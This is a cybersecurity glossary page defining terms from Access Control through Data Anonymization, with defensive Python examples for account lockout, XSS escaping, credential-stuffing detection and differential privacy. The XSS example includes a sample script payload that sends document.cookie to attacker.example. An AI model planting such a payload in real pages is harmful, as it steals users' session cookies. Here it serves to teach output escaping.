
Cybersecurity Glossary

A comprehensive reference of cybersecurity terms, threats, technologies, and best practices. Written by security professionals for IT leaders, compliance teams, and anyone looking to strengthen their security knowledge.

Cybersecurity terminology for practical decisions

Security conversations often fail because teams use the same words to mean different things. This glossary gives leaders, IT teams, compliance owners, and security practitioners a shared reference for the terms that appear in assessments, audits, policies, incident reports, vendor questionnaires, and executive risk briefings.

Each definition is written for action rather than trivia. Use it to clarify what a term means, why it matters, which related concepts to compare, and where it fits in a modern cybersecurity program.

260 security terms across 10 topic areas, with A-Z indexed browsing and an FAQ section.

Popular Cybersecurity Definitions

Start with the concepts most often used in security assessments, compliance planning, breach response, and executive risk discussions.

Infrastructure

Zero Trust

Zero Trust is a security framework that requires all users, devices, and applications to be verified, authenticated, and continuously validated before being granted access to resources, regardless of whether they are inside or outside the network perimeter.

Threats & Attacks

Ransomware

Ransomware is a type of malware that encrypts a victim's files or locks them out of their systems, then demands a ransom payment in exchange for the decryption key. Modern ransomware often includes double extortion, where attackers also threaten to leak stolen data.

Security Operations

Incident Response

Incident response is the organized approach to addressing and managing the aftermath of a security breach or cyberattack. The goal is to handle the situation in a way that limits damage, reduces recovery time and costs, and prevents future incidents.

Assessment & Testing

Penetration Testing

Penetration testing (pen testing) is a simulated cyberattack against your computer system, network, or web application to identify exploitable vulnerabilities. Ethical hackers use the same tools and techniques as malicious attackers to find weaknesses before they can be exploited.

Risk & Compliance

SOC 2

SOC 2 (System and Organization Controls 2) is an attestation framework developed by the AICPA that evaluates an organization's information systems against five trust services criteria: security, availability, processing integrity, confidentiality, and privacy. Security (the common criteria) is required in every SOC 2 report; the other four are included only when they are in scope for the service being audited.

Security Operations

SIEM

Security Information and Event Management (SIEM) is a technology solution that collects, aggregates, and analyzes security event data from across an organization's IT infrastructure. SIEM provides real-time monitoring, threat detection, correlation of security events, and compliance reporting.

Security Operations

Managed Detection and Response

Managed Detection and Response (MDR) is a cybersecurity service that combines technology and human expertise to perform threat monitoring, detection, and response on behalf of organizations that lack in-house security operations capabilities.

Infrastructure

Cloud Security

Cloud security is the set of policies, controls, technologies, and procedures used to protect data, applications, and infrastructure hosted in cloud computing environments. It addresses unique challenges such as shared responsibility, multi-tenancy, and dynamic resource provisioning.

Identity & Access

Multi-Factor Authentication

Multi-Factor Authentication (MFA) is a security method that requires users to provide two or more verification factors from different categories to gain access to a resource: something you know (password or PIN), something you have (hardware token or authenticator app), and something you are (biometrics). Two factors of the same category, such as a password plus a security question, do not qualify.

Browse by Security Domain

Use these domain summaries to move from isolated definitions into the broader security program area they support.

Threats & Attacks

Cyber Threats and Attack Methods

Understand ransomware, phishing, malware, DDoS attacks, supply-chain compromises, credential theft, and other attacker techniques that create business risk.

Identity & Access

Identity, Access, and Zero Trust

Learn how authentication, authorization, least privilege, MFA, SSO, PAM, and Zero Trust controls reduce unauthorized access.

Risk & Compliance

Compliance, Governance, and Risk

Compare frameworks and governance concepts such as SOC 2, HIPAA, PCI DSS, ISO 27001, NIST CSF, risk assessments, and security policies.

Cloud Security

Cloud and Modern Infrastructure

Clarify cloud security posture, shared responsibility, container security, Kubernetes security, CSPM, CWPP, CASB, and secure cloud operations.

Security Operations

Detection, Response, and Operations

Explore SIEM, SOAR, XDR, MDR, SOC operations, incident response, digital forensics, threat hunting, and vulnerability management.

Data Protection

Data Protection and Privacy

Review encryption, DLP, tokenization, data classification, backup and recovery, data sovereignty, privacy impact assessments, and breach notification.

Suggested Learning Paths

New to Cybersecurity

Start with the core language behind security programs: threats, vulnerabilities, risk, controls, and incident response.

Compliance and Audit Readiness

Use these definitions to align leadership, IT, and auditors before evidence collection and control remediation begin.

Security Operations Leaders

Clarify the operational terms teams use when building detection, response, monitoring, and continuous improvement programs.

Cybersecurity Terms by Industry

Different industries face unique cybersecurity challenges and regulatory requirements. Explore glossary terms relevant to your sector.

Trending Cybersecurity Topics 2025

AI Security & Deepfakes

Understand the emerging risks from generative AI, adversarial machine learning, prompt injection, and deepfake social engineering attacks targeting organizations.

Identity-Centric Security

Explore identity threat detection, zero trust network access, conditional access, and modern approaches to protecting against identity-based attacks.

Cloud-Native Protection

Learn about CNAPP, container registry security, serverless security, and securing infrastructure-as-code in multi-cloud environments.

Ransomware & Extortion

Stay informed on ransomware response, double extortion tactics, backup strategies, and business continuity planning for ransomware resilience.

Supply Chain Security

Discover how to assess vendor risk, secure software supply chains, implement SBOM practices, and defend against supply chain compromises.

Quantum Readiness

Prepare for the post-quantum era with insights on quantum computing threats, cryptographic migration, and NIST post-quantum standards.

A
15 terms

Access Control

Identity & Access

Access control is a security mechanism that regulates who or what can view, use, or interact with resources in a computing environment. It enforces policies that grant or deny permissions based on user identity, role, or other attributes.

Advanced Persistent Threat

Threats & Attacks

An Advanced Persistent Threat (APT) is a prolonged, targeted cyberattack in which an intruder gains access to a network and remains undetected for an extended period. APTs typically target high-value organizations to steal data rather than cause immediate damage.

Authentication

Identity & Access

Authentication is the process of verifying the identity of a user, device, or system before granting access to resources. It typically involves credentials such as passwords, biometrics, security tokens, or digital certificates.

Authorization

Identity & Access

Authorization is the security process that determines whether an authenticated user or system has permission to access a specific resource or perform a particular action. It follows authentication and enforces access policies.

Active Directory

Identity & Access

Active Directory (AD) is Microsoft's directory service for Windows domain networks that provides authentication, authorization, group policy management, and centralized resource management across an organization.

Account Lockout

Identity & Access

Account Lockout is a security mechanism that temporarily or permanently disables a user account after a specified number of consecutive failed authentication attempts within a time window, to slow or stop brute force attacks. Because an attacker can trigger lockouts deliberately, the threshold and duration must be balanced against the denial of service this causes for legitimate users.
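The policy described above, as an added worked example (not code from this glossary or any vendor product): a threshold of failures inside an observation window locks the account for a fixed period, and attempts made while locked are refused without evaluating the password. The thresholds, the event format, and the sample events are assumptions constructed for the example; the last events show the denial-of-service side effect, where the real user is refused while the lock is in force.

```python
"""Account lockout policy replayed over constructed authentication events.

Added illustration of the Account Lockout entry; not code from the glossary
page or any product. Thresholds, window and event format are assumptions.
"""
from dataclasses import dataclass, field

LOCKOUT_THRESHOLD = 5      # consecutive failures before lockout (assumed policy)
LOCKOUT_SECONDS = 900      # 15-minute temporary lockout (assumed policy)
OBSERVATION_WINDOW = 600   # failures older than this no longer count (assumed policy)


@dataclass
class AccountState:
    failures: list = field(default_factory=list)  # timestamps of recent failures
    locked_until: float = 0.0


class LockoutPolicy:
    def __init__(self):
        self.accounts = {}

    def _state(self, user):
        return self.accounts.setdefault(user, AccountState())

    def is_locked(self, user, now):
        return now < self._state(user).locked_until

    def record_attempt(self, user, success, now):
        """Apply one login attempt; return 'allowed', 'failed', 'locked' or 'rejected'.

        'rejected' means the attempt was refused because the account is locked,
        so the password is never checked and the response cannot reveal whether
        it was correct.
        """
        st = self._state(user)
        if now < st.locked_until:
            return "rejected"
        # failures outside the observation window no longer count
        st.failures = [t for t in st.failures if now - t <= OBSERVATION_WINDOW]
        if success:
            st.failures.clear()
            return "allowed"
        st.failures.append(now)
        if len(st.failures) >= LOCKOUT_THRESHOLD:
            st.locked_until = now + LOCKOUT_SECONDS
            st.failures.clear()
            return "locked"
        return "failed"


def replay(events):
    """Run (timestamp, user, success) events through one policy; return outcomes."""
    policy = LockoutPolicy()
    return [policy.record_attempt(u, ok, t) for t, u, ok in events]


# Constructed sample: an attacker guesses alice's password six times in a row,
# then alice herself tries the correct password while the account is locked.
SAMPLE_EVENTS = [
    (0, "alice", False), (5, "alice", False), (10, "alice", False),
    (15, "alice", False), (20, "alice", False),   # 5th failure -> locked
    (25, "alice", False),                          # rejected, not evaluated
    (30, "alice", True),                           # legitimate user also rejected
    (1000, "alice", True),                         # lock expired -> allowed
]

if __name__ == "__main__":
    for ev, outcome in zip(SAMPLE_EVENTS, replay(SAMPLE_EVENTS)):
        print(ev, "->", outcome)
```

Real deployments pair this with per-source rate limiting and MFA, so that an attacker who can only lock accounts cannot also keep the real user out indefinitely.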

ARP Spoofing

Threats & Attacks

ARP Spoofing is a network attack where an attacker sends falsified ARP messages on a local network to link their MAC address with a legitimate IP address, intercepting or modifying network traffic.

Adware

Threats & Attacks

Adware is software that automatically displays or downloads unwanted advertising content, often bundled with free programs, and may track browsing habits to deliver targeted advertisements.

Acceptable Use Policy

Risk & Compliance

An Acceptable Use Policy (AUP) defines the rules and guidelines for how employees and users may use an organization's IT resources, including computers, networks, email, internet access, and software.

AES Encryption

Data Protection

AES (Advanced Encryption Standard) is a symmetric block cipher with a 128-bit block size and 128, 192, or 256-bit keys, standardized by NIST in FIPS 197 and adopted by the US government for encrypting sensitive data. AES itself only encrypts single blocks; it must be used in a secure mode of operation such as AES-GCM, which also authenticates the data, rather than raw ECB mode, which leaks patterns in the plaintext.

API Security

Application Security

API Security encompasses the practices and tools for protecting Application Programming Interfaces from attacks, abuse, and unauthorized access, ensuring data integrity and confidentiality in API-driven architectures.

AI Security

Emerging Technology

AI Security addresses the unique threats and vulnerabilities associated with artificial intelligence and machine learning systems, including adversarial attacks, model poisoning, data privacy, and the security of AI-driven decision-making.

Application Security

Application Security

Application Security is the practice of protecting software applications from threats throughout their entire lifecycle, using a combination of secure development practices, security testing, and runtime protection technologies.

Attack Surface Management

Security Operations

Attack Surface Management (ASM) is the continuous discovery, inventory, classification, and monitoring of an organization's internet-facing assets and exposures to identify and reduce potential entry points for attackers.

Adversarial Machine Learning

Emerging Technology

Adversarial Machine Learning is the study of techniques that exploit vulnerabilities in AI and ML systems by crafting inputs designed to cause models to make incorrect predictions or classifications.

B
15 terms

Botnet

Threats & Attacks

A botnet is a network of compromised computers or devices (bots) that are remotely controlled by a threat actor. Botnets are used to launch distributed denial-of-service (DDoS) attacks, send spam, steal data, and perform other malicious activities at scale.

Business Continuity

Risk & Compliance

Business continuity is an organization's ability to maintain essential functions during and after a disaster or disruptive event. In cybersecurity, it encompasses planning, policies, and procedures that ensure critical systems and data remain available during security incidents.

Biometric Authentication

Identity & Access

Biometric Authentication uses unique physical or behavioral characteristics such as fingerprints, facial recognition, iris scans, or voice patterns to verify a person's identity for access control.

Business Email Compromise

Threats & Attacks

Business Email Compromise (BEC) is a sophisticated scam targeting organizations that conduct wire transfers, where attackers impersonate executives or trusted partners via email to trick employees into transferring funds or sensitive data.

Brute Force Attack

Threats & Attacks

A Brute Force Attack is a trial-and-error method in which attackers systematically try candidate passwords or encryption keys until the correct one is found. A dictionary attack is the common variant that tries likely passwords first; defenses include account lockout, rate limiting, slow password hashing, and MFA.

Business Impact Analysis

Risk & Compliance

A Business Impact Analysis (BIA) is the process of determining the potential effects of disruptions to critical business operations, including financial losses, operational impacts, and recovery priorities.

BGP Security

Infrastructure

BGP Security refers to the practices and technologies that protect the Border Gateway Protocol from route hijacking, route leaks, and other attacks that can misdirect internet traffic at a global scale.

Backup and Recovery

Data Protection

Backup and Recovery is the practice of creating and storing copies of data so that it can be restored after data loss events such as hardware failures, ransomware attacks, accidental deletion, or natural disasters.

Blue Team

Security Operations

A Blue Team is a group of security professionals responsible for defending an organization's information systems by maintaining security controls, detecting threats, responding to incidents, and strengthening defenses against attacks.

Bug Bounty

Security Operations

A Bug Bounty program is a crowdsourced initiative that rewards independent security researchers for discovering and responsibly reporting security vulnerabilities in an organization's systems, applications, or products.

Blockchain Security

Emerging Technology

Blockchain Security encompasses the practices and technologies for protecting blockchain networks, smart contracts, cryptocurrency wallets, and decentralized applications from attacks, vulnerabilities, and fraud.

Bring Your Own Device

Risk & Compliance

Bring Your Own Device (BYOD) is a corporate policy that allows employees to use their personal devices for work activities, requiring security controls that protect corporate data without infringing on personal privacy.

Bluetooth Security

Infrastructure

Bluetooth Security refers to the protection of wireless communications between devices using Bluetooth protocols, addressing vulnerabilities such as eavesdropping, unauthorized pairing, and exploitation of implementation flaws.

Breach Response

Security Operations

Breach Response is the comprehensive process of managing a data breach from initial detection through containment, investigation, notification, remediation, and post-incident improvement.

Break-Glass Account

Identity & Access

A Break-Glass Account is an emergency administrative account used only when standard authentication systems fail or during critical incidents, providing last-resort access with strict monitoring and documentation requirements.

C
33 terms

Cloud Security

Infrastructure

Cloud security is the set of policies, controls, technologies, and procedures used to protect data, applications, and infrastructure hosted in cloud computing environments. It addresses unique challenges such as shared responsibility, multi-tenancy, and dynamic resource provisioning.

Compliance

Risk & Compliance

Compliance in cybersecurity refers to the process of meeting established security standards, regulations, and legal requirements. Organizations must adhere to frameworks such as SOC 2, HIPAA, PCI DSS, GDPR, and industry-specific regulations to protect data and avoid penalties.

Cryptography

Data Protection

Cryptography is the practice and study of techniques for securing communication and data by transforming information into an unreadable format using mathematical algorithms. Only authorized parties with the correct key can decrypt and access the original data.

Certificate Authority

Identity & Access

A Certificate Authority (CA) is a trusted entity that issues, manages, and revokes digital certificates used to verify the identity of organizations, servers, and individuals in encrypted communications.

Cross-Site Scripting (XSS)

Threats & Attacks

Cross-Site Scripting (XSS) is a web application vulnerability in which untrusted input is reflected or stored in a page without output encoding, allowing attackers to inject malicious client-side scripts that run in other users' browsers and enable session hijacking, defacement, or malicious redirects. The primary defense is context-aware output encoding, with a Content Security Policy as a second layer.
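The unsafe-interpolation bug beside its escaped form, as an added example (not code from this glossary): the hypothetical search page below renders a `q` parameter into an HTML body and into an attribute. The payloads are constructed for the example; the point is that the same input becomes markup in one function and inert text in the other, and that the attribute context additionally needs quotes escaped.

```python
"""Reflected XSS: unsafe string interpolation versus context-aware escaping.

Added illustration of the XSS entry; not code from the glossary page.
The search page, the q parameter and the payloads are constructed.
"""
import html

# Constructed attacker inputs as they might arrive in a ?q= parameter
BODY_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
ATTR_PAYLOAD = '" onmouseover="alert(1)'


def render_vulnerable(term):
    """Interpolates user input straight into HTML: the <script> tag becomes live markup."""
    return f"<p>Results for: {term}</p>"


def render_escaped(term):
    """HTML body context: escape <, >, & and quotes so the input is shown as text."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def render_attribute_vulnerable(term):
    """Attribute context with no escaping: the input closes the quote and adds a handler."""
    return f'<input name="q" value="{term}">'


def render_attribute_escaped(term):
    """Attribute context: quote=True turns the double quote into &quot; so the
    value cannot break out of the attribute."""
    return f'<input name="q" value="{html.escape(term, quote=True)}">'


def contains_live_script(page):
    """Crude check used in this example: is there an unescaped <script> tag or
    an injected on* event handler in the rendered page?"""
    lowered = page.lower()
    return "<script>" in lowered or '" onmouseover=' in lowered


if __name__ == "__main__":
    print(render_vulnerable(BODY_PAYLOAD))
    print(render_escaped(BODY_PAYLOAD))
    print(render_attribute_vulnerable(ATTR_PAYLOAD))
    print(render_attribute_escaped(ATTR_PAYLOAD))
```

html.escape is correct only for HTML body and quoted-attribute contexts; input placed into JavaScript, URLs, or CSS needs the encoder for that context, and a templating engine with auto-escaping enabled is the safer default.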

Credential Stuffing

Threats & Attacks

Credential Stuffing is an automated attack that uses stolen username and password pairs from data breaches to gain unauthorized access to user accounts on other services, exploiting password reuse.
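Credential stuffing looks different in authentication logs from the single-account brute force described earlier: one source touches many accounts roughly once each, rather than one account many times. The added example below (not code from this glossary) classifies sources from a constructed log; the line format, thresholds, and sample lines are assumptions made for the example.

```python
"""Telling credential stuffing apart from single-account brute force in auth logs.

Added illustration of the Credential Stuffing entry; not code from the page.
Log format, thresholds and the sample lines are constructed for this example.
"""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<ts>\d+) src=(?P<ip>[\d.]+) user=(?P<user>\S+) result=(?P<result>ok|fail)$"
)

# Constructed log: 10.0.0.9 tries many different accounts once each (stuffing),
# 10.0.0.7 hammers one account (brute force), 10.0.0.5 is a normal user.
SAMPLE_LOG = """\
100 src=10.0.0.9 user=alice result=fail
101 src=10.0.0.9 user=bob result=fail
102 src=10.0.0.9 user=carol result=fail
103 src=10.0.0.9 user=dave result=ok
104 src=10.0.0.9 user=erin result=fail
105 src=10.0.0.9 user=frank result=fail
110 src=10.0.0.7 user=admin result=fail
111 src=10.0.0.7 user=admin result=fail
112 src=10.0.0.7 user=admin result=fail
113 src=10.0.0.7 user=admin result=fail
114 src=10.0.0.7 user=admin result=fail
115 src=10.0.0.7 user=admin result=fail
120 src=10.0.0.5 user=alice result=fail
121 src=10.0.0.5 user=alice result=ok
"""

DISTINCT_USERS_MIN = 5   # assumed: this many distinct accounts from one source
ATTEMPTS_MIN = 5         # assumed: minimum attempts before any verdict


def parse(log):
    """Yield (timestamp, source_ip, user, success) for every well-formed line."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield int(m["ts"]), m["ip"], m["user"], m["result"] == "ok"


def classify_sources(log):
    """Return {source_ip: 'credential_stuffing' | 'brute_force' | 'benign'}."""
    attempts = defaultdict(list)
    for _ts, ip, user, ok in parse(log):
        attempts[ip].append((user, ok))
    verdict = {}
    for ip, tries in attempts.items():
        users = {u for u, _ in tries}
        failures = sum(1 for _, ok in tries if not ok)
        if len(tries) < ATTEMPTS_MIN:
            verdict[ip] = "benign"
        elif len(users) >= DISTINCT_USERS_MIN:
            # many accounts, about one attempt each: replay of breached credentials
            verdict[ip] = "credential_stuffing"
        elif len(users) == 1 and failures >= ATTEMPTS_MIN:
            verdict[ip] = "brute_force"
        else:
            verdict[ip] = "benign"
    return verdict


def compromised_accounts(log, verdicts):
    """Accounts where a source judged to be stuffing actually logged in (the
    high-priority signal: these passwords were reused and are now burned)."""
    return sorted({user for _ts, ip, user, ok in parse(log)
                   if ok and verdicts.get(ip) == "credential_stuffing"})


if __name__ == "__main__":
    v = classify_sources(SAMPLE_LOG)
    print(v)
    print("reset these accounts:", compromised_accounts(SAMPLE_LOG, v))
```

Per-source thresholds are easy to evade by spreading the run across proxy or residential IP pools, so production detection also watches the global failure rate, checks submitted passwords against breach corpora, and fingerprints the client; the successful logins inside a stuffing run are the ones that need an immediate password reset.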

Cryptojacking

Threats & Attacks

Cryptojacking is the unauthorized use of someone's computing resources to mine cryptocurrency, typically delivered through malicious scripts in web browsers or malware installed on the victim's device.

CMMC

Risk & Compliance

The Cybersecurity Maturity Model Certification (CMMC) is a US Department of Defense framework that requires defense contractors to meet specific cybersecurity maturity levels to protect controlled unclassified information (CUI).

CCPA

Risk & Compliance

The California Consumer Privacy Act (CCPA) is a state privacy law that gives California residents the right to know what personal data is collected about them, to delete it, to opt out of its sale, and to receive equal service regardless of exercising their rights.

Compliance Audit

Risk & Compliance

A Compliance Audit is a formal examination of an organization's adherence to regulatory requirements, industry standards, and internal policies, conducted by internal or external auditors to verify security controls are implemented and effective.

Configuration Management

Security Operations

Configuration Management is the process of maintaining systems, servers, and software in a consistent, desired state, ensuring security settings, hardening baselines, and compliance configurations are applied and monitored.

Change Management

Security Operations

Change Management is the structured process for reviewing, approving, and implementing changes to IT systems and infrastructure to minimize risk, prevent unauthorized modifications, and maintain system stability and security.

CASB

Cloud Security

A Cloud Access Security Broker (CASB) is a security policy enforcement point positioned between cloud service consumers and providers to monitor activity, enforce security policies, and protect data in cloud applications.

CSPM

Cloud Security

Cloud Security Posture Management (CSPM) is a category of security tools that continuously monitors cloud infrastructure for misconfigurations, compliance violations, and security risks, providing automated remediation recommendations.

CWPP

Cloud Security

Cloud Workload Protection Platform (CWPP) is a security solution that provides consistent protection for server workloads across physical machines, virtual machines, containers, and serverless functions in any cloud environment.

Cloud Access Security

Cloud Security

Cloud Access Security encompasses the policies, technologies, and controls that govern how users and devices access cloud services, ensuring that only authorized entities can reach cloud resources through secure channels.

Cloud Workload Protection

Cloud Security

Cloud Workload Protection is the practice of securing computing workloads running in cloud environments through runtime protection, vulnerability management, integrity monitoring, and behavioral analysis across VMs, containers, and serverless functions.

Container Security

Cloud Security

Container Security encompasses the tools, policies, and practices for protecting containerized applications throughout their lifecycle, from image building and registry storage to runtime deployment and orchestration.

Cloud Key Management

Cloud Security

Cloud Key Management is the practice of creating, storing, rotating, and managing cryptographic keys used to encrypt data in cloud environments, often leveraging cloud-native key management services or hardware security modules.

Code Review

Application Security

Security Code Review is the systematic examination of application source code to identify security vulnerabilities, coding flaws, and deviations from secure coding practices before the code is deployed to production.

Cyber Insurance

Risk & Compliance

Cyber Insurance is a specialized insurance product that provides financial protection against losses resulting from cyber incidents such as data breaches, ransomware attacks, business interruption, and regulatory penalties.

Cyber Kill Chain

Security Operations

The Cyber Kill Chain is a framework developed by Lockheed Martin that describes a cyberattack as seven stages: reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on objectives (such as data exfiltration). Mapping controls to each stage helps defenders identify and disrupt an intrusion before it reaches its goal.

Cyber Resilience

Risk & Compliance

Cyber Resilience is an organization's ability to continuously deliver intended outcomes despite adverse cyber events, combining cybersecurity, business continuity, and organizational adaptability to withstand and recover from attacks.

Compliance as a Service

Risk & Compliance

Compliance as a Service (CaaS) is a cloud-based model that provides organizations with ongoing compliance monitoring, evidence collection, policy management, and audit preparation through a managed service platform.

Chain of Custody

Security Operations

Chain of Custody is the documented chronological record that establishes the seizure, control, transfer, analysis, and disposition of physical or electronic evidence in legal or investigative proceedings.

Container Registry Security

Cloud Security

Container Registry Security involves protecting repositories that store container images by implementing access controls, vulnerability scanning, image signing, and integrity verification to prevent the deployment of compromised containers.

Cloud-Native Application Protection Platform

Cloud Security

A Cloud-Native Application Protection Platform (CNAPP) is an integrated security solution that combines CSPM, CWPP, vulnerability management, and runtime protection into a unified platform for securing cloud-native applications.

Command and Control

Threats & Attacks

Command and Control (C2 or C&C) refers to the infrastructure and communication channels that attackers use to remotely manage compromised systems, issue commands, exfiltrate data, and maintain persistence within a victim's network.

Conditional Access

Identity & Access

Conditional Access is an identity-driven security policy framework that enforces access decisions based on contextual signals such as user identity, device health, location, and risk level before granting access to resources.

Consent Management

Data Protection

Consent Management is the process of obtaining, recording, managing, and honoring user permissions for data collection, processing, and sharing, ensuring compliance with privacy regulations like GDPR and CCPA.

Critical Infrastructure Protection

Risk & Compliance

Critical Infrastructure Protection encompasses the strategies, programs, and security measures designed to secure the assets, systems, and networks that are essential to national security, economic stability, and public health and safety.

Cyber Range

Security Operations

A Cyber Range is a simulated virtual environment used for cybersecurity training, testing, and research that replicates real-world networks, systems, and attack scenarios in a safe, isolated setting.

Cyber Threat Hunting

Security Operations

Cyber Threat Hunting is the proactive, hypothesis-driven search for advanced threats and adversary activity within an organization's environment that evades existing automated security defenses.

D
30 terms

DDoS

Threats & Attacks

A Distributed Denial-of-Service (DDoS) attack is a cyberattack that overwhelms a target server, service, or network with a flood of internet traffic from multiple distributed sources. The goal is to make the target unavailable to legitimate users by exhausting its resources.

Data Loss Prevention

Data Protection

Data Loss Prevention (DLP) is a set of tools and processes that ensure sensitive data is not lost, misused, or accessed by unauthorized users. DLP solutions monitor, detect, and block the unauthorized transmission of confidential information.

Disaster Recovery

Risk & Compliance

Disaster recovery is the process and set of policies for restoring IT systems, data, and infrastructure after a cyberattack, natural disaster, or other disruptive event. It focuses on minimizing downtime and data loss through backup strategies and recovery procedures.

Digital Certificate

Identity & Access

A Digital Certificate is an electronic credential issued by a certificate authority that binds a public key to an identity, enabling encrypted communication and authentication between parties.

Denial of Service (DoS)

Threats & Attacks

A Denial of Service (DoS) attack aims to make a machine, network, or service unavailable to its intended users by overwhelming it with traffic or exploiting vulnerabilities that cause the system to crash.

Drive-by Download

Threats & Attacks

A Drive-by Download is a malware delivery method in which malicious software is automatically downloaded to a user's device when they visit a compromised or malicious website, typically by exploiting a browser or plugin vulnerability, without any interaction beyond loading the page.

Domain Spoofing

Threats & Attacks

Domain Spoofing is a technique where attackers forge or impersonate a legitimate domain name in emails or websites to deceive users into believing they are interacting with a trusted entity.

DNS Poisoning

Threats & Attacks

DNS Poisoning (also called DNS Spoofing) is an attack that corrupts DNS cache data so that domain name queries return incorrect IP addresses, redirecting users to malicious websites without their knowledge.

Data Retention Policy

Risk & Compliance

A Data Retention Policy defines how long an organization keeps different types of data, when data should be securely disposed of, and the procedures for managing the data lifecycle to meet legal and business requirements.

DMZ (Demilitarized Zone)

Infrastructure

A DMZ (Demilitarized Zone) is a network segment that acts as a buffer zone between an organization's internal network and untrusted external networks, hosting public-facing services while protecting the internal network.

DNS Security

Infrastructure

DNS Security encompasses the technologies and practices that protect DNS infrastructure from attacks such as DNS poisoning, amplification attacks, and hijacking, ensuring the integrity and availability of domain name resolution.

DNSSEC

Infrastructure

DNSSEC (Domain Name System Security Extensions) is a suite of specifications that adds origin authentication and integrity to DNS data through digital signatures, so that a validating resolver can detect spoofed or poisoned responses. DNSSEC does not provide confidentiality: queries and responses remain in cleartext unless DNS over TLS or DNS over HTTPS is also used.

Data Classification

Data Protection

Data Classification is the process of categorizing data based on its sensitivity level and business value, enabling organizations to apply appropriate security controls, access restrictions, and handling procedures for each category.

Data Masking

Data Protection

Data Masking is a technique that obscures specific data within a database to protect sensitive information while maintaining the data's usability for testing, development, or analytics purposes.

Data Sovereignty

Data Protection

Data Sovereignty is the concept that data is subject to the laws and governance of the country or region where it is collected, processed, or stored, requiring organizations to understand and comply with local data regulations.

Data Breach Notification

Data Protection

Data Breach Notification is the legal requirement for organizations to inform affected individuals, regulators, and sometimes the public when personal data has been compromised in a security breach, within specified timeframes.

Digital Rights Management

Data Protection

Digital Rights Management (DRM) is a set of technologies and policies that control access to, and usage of, copyrighted digital content and proprietary information, preventing unauthorized copying, distribution, and modification.

Digital Forensics

Security Operations

Digital Forensics is the process of collecting, preserving, analyzing, and presenting digital evidence from computers, networks, and mobile devices in a manner that is legally admissible and maintains chain of custody.

Dynamic Application Security Testing (DAST)

Application Security

Dynamic Application Security Testing (DAST) is a black-box testing methodology that analyzes running web applications by simulating attacks from the outside to identify security vulnerabilities in deployed applications.

DevSecOps

Application Security

DevSecOps is a software development methodology that integrates security practices throughout the entire development lifecycle, making security a shared responsibility between development, security, and operations teams rather than an afterthought.

Digital Twin Security

Emerging Technology

Digital Twin Security focuses on protecting the virtual replicas of physical systems, processes, or products that are used for simulation, monitoring, and optimization, ensuring the integrity of both the digital model and its connection to real-world assets.

Data Loss Prevention (DLP)

Data Protection

Data Loss Prevention (DLP) encompasses the strategies, processes, and technologies used to detect and prevent the unauthorized transmission, exfiltration, or exposure of sensitive data from an organization's network.

Distributed Denial of Service (DDoS)

Threats & Attacks

A Distributed Denial of Service (DDoS) attack uses multiple compromised systems across the internet to flood a target with traffic, overwhelming resources and making services unavailable to legitimate users.

Data Encryption at Rest

Data Protection

Data Encryption at Rest is the practice of encrypting stored data on disk, in databases, or in storage systems so that the data remains protected even if the physical storage media is accessed by unauthorized parties.

Data Privacy

Data Protection

Data Privacy is the right of individuals to control how their personal information is collected, used, stored, and shared by organizations, enforced through regulations like GDPR, CCPA, and PIPEDA.

Deepfake

Emerging Technology

A Deepfake is synthetic media created using deep learning techniques to replace a person's likeness or voice with someone else's, posing significant risks for disinformation, fraud, and social engineering attacks.

Data Exfiltration

Threats & Attacks

Data Exfiltration is the unauthorized transfer of data from a computer or network to an external destination, often performed by malicious insiders, compromised accounts, or advanced persistent threats stealing sensitive information.

Dumpster Diving

Threats & Attacks

Dumpster Diving is a physical information gathering technique where attackers search through an organization's trash or recycling to find discarded documents, storage media, or other materials containing sensitive information.

Differential Privacy

Data Protection

Differential Privacy is a mathematical framework for releasing statistics about a dataset while bounding what can be learned about any single individual in it. Calibrated random noise is added to query results so that the output distribution changes by at most a factor controlled by a privacy parameter (epsilon) whether or not any one person's record is included; each query spends part of a finite privacy budget.
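The Laplace mechanism for a counting query, as an added example (not code from this glossary): the noise scale is the query's sensitivity divided by epsilon, and a budget object stops repeated queries from averaging the noise away. The records, epsilon values, and the injectable random source are constructed assumptions for the example.

```python
"""Laplace mechanism for a differentially private count, with a privacy budget.

Added illustration of the Differential Privacy entry; not code from the page.
The dataset, epsilon values and the injectable rng are constructed for the example.
"""
import math
import random

# Constructed records: (user_id, has_condition); 10 of 30 users have the condition
RECORDS = [(i, i % 3 == 0) for i in range(30)]


def true_count(records):
    return sum(1 for _, flag in records if flag)


def laplace_noise(scale, rng):
    """Sample Laplace(0, scale) by inverse CDF from a uniform in [0, 1).

    rng only needs a .random() method, so a fixed source can be injected
    to make the result reproducible (u = 0 gives zero noise).
    """
    u = rng.random() - 0.5
    # keep |u| strictly below 0.5 so log(1 - 2|u|) stays defined
    u = max(min(u, 0.5 - 1e-12), -0.5 + 1e-12)
    return -scale * math.copysign(1.0, u) * math.log(1.0 - 2.0 * abs(u))


def private_count(records, epsilon, rng=random, sensitivity=1):
    """Counting query: adding or removing one person changes the true answer by
    at most 1, so sensitivity is 1 and the noise scale is 1 / epsilon."""
    if epsilon <= 0:
        raise ValueError("epsilon must be positive")
    return true_count(records) + laplace_noise(sensitivity / epsilon, rng)


class PrivacyBudget:
    """Tracks cumulative epsilon; once spent, no further queries are answered."""

    def __init__(self, total_epsilon):
        self.remaining = total_epsilon

    def query(self, records, epsilon, rng=random):
        if epsilon > self.remaining:
            raise RuntimeError("privacy budget exhausted")
        self.remaining -= epsilon
        return private_count(records, epsilon, rng)


if __name__ == "__main__":
    budget = PrivacyBudget(total_epsilon=1.0)
    print("true:", true_count(RECORDS))
    print("epsilon 0.5:", budget.query(RECORDS, 0.5))
    print("epsilon 0.5:", budget.query(RECORDS, 0.5))
    print("remaining budget:", budget.remaining)
```

Smaller epsilon means a larger noise scale and stronger privacy; the budget is what makes the guarantee hold across many queries, and in production the random source must be a cryptographically secure generator rather than the `random` module used here for illustration.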

Data Anonymization

Data Protection

Data Anonymization is the process of removing or modifying personally identifiable information in datasets so that individuals cannot be identified, allowing the data to be used for analysis, research, or sharing without privacy violations. Removing direct identifiers alone is not sufficient: combinations of quasi-identifiers such as date of birth, postal code, and gender can still be linked to external data to re-identify people, which is why techniques such as generalization, k-anonymity, and differential privacy exist.

E
8 terms

Encryption

Data Protection

